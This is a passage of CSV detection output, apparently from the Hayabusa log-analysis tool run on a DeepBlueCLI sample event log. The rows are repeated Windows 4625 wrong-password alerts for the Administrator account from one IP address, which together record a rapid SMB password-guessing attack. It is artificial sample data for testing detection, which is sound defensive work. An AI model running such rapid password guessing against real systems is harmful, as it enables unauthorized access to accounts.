NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.617 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ISlMGsVvXry0rbju | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MjGjh70EQ5YVGJUt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.700 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yaYM5N2kuvuRCHRU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.738 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 32wgj2t7BLBviVxd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.789 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vr1kMRxLEaCIWIbf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.832 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4PHEJyKgp5wXRtBk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dbaoz8rTZVXUjRAg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d4eD3JQ5gquIqgND | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.969 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U9slFFSSXhFxPqG1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.009 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YDb5Up4KwJj0hN5n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.063 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DxqIpDLlnf6Xyc34 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.106 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rTCTTYmKTIzzJwxH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.145 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oD3dLxlB3qWIhZEQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.193 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fe9xMOoCxPJIIyVq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.246 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DW3YgBZYiGTeEw66 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.293 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VAKeeIcOeiQ3H9NF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.338 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nmF3ot3gJCsBlSwF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.395 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wDjoResfZvvVqqE5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.437 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V4dwzMwvVtzztGwr | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.491 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0qklApBFOMxVzucD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.538 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0IJSphtLB3eNARBo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.582 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PLOFe4w5KpJ2UaGM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.620 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cF3JTWkGadY1fJE2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.666 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kyTH0jxSZB2YVdhW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.709 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NRq5XrcDkFvabCzh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.750 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zlYwlgrsMy1kSgEC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.790 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AchwW4ifbZ41AQNg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1PaxF7Q8ue1Kex1h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.888 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WAhW2PErXdwNVrx5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.943 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LoAV3ESqieev2JMC | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.012 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wFlWFijaFirgsAtJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.049 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hSDjuqvzKLaWCWVo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.109 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SL0CVu787iFRLiPU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.219 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZQDORN33izpv4tGO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.253 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v470yorD43fgGyjC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.305 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LBbLWVZFDqFxb7dW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.360 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RJsowt9MrhXciLOZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.404 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uhCVFyMmDI5shASV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.452 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yd4SM9EGM7cnO6Z5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.490 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PSR1tbtzdDaJDbXs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.538 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rNqyjBuN0Pq6WRO1 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.585 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vqpMAmE9OvHbFCh2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.632 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JfLQAaB0DPvxWQMB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.676 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A0kvHMwnj2k0HMLQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kPqfVDftcR4iRDaw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.748 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1bltwm2g13InAJM6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.788 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J2iFr8ppe5NzukXF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7EEUOBohBFRze6hL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.887 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NCOFn3WM71KmaZyB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UdUkBxB1auduRfdS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.980 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E2JaWoYK56HRGfW1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.015 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a3JTCX9NIOpg6TFB | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.064 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zFGkdUVAdKcrrREB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.108 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7oZW00FpKema01Vw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.151 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p4HbNQx0Acf83b1h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j9aM5UCQbOLvcpI0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.238 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BGGChEAIdej9lBhr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.288 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4CaFYB1ImWAWbH0W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OLa3lkxWiJ00raQh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vMzyi0jIVLNrodC8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.409 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n2repX0roAP2j0TI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.460 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gqcpIjdkNpmoTe4A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.488 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Edgo9UdNvmMJpiyn | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.532 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LpqOTu7Xn7ULipmN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.567 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TP0efL79STMbuu9g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.610 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HkwWfRi0E5sVY6UT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IkyCe9NXGExCQS5r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.698 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IGnhRwa7P7by9vJO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.740 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fh7IGliNbSyKwxpM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.782 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1QfgWsAqSYQfB9l5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.821 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q8VM66P8Vluf7yrL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.861 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cdYiwh3QjdA0Zoge | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.904 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ou3FPUI5bFcUvuFC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.952 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bMUg8N7apFtUgX9d | IP Addr: 192.168.198.149 | AuthPackage: 
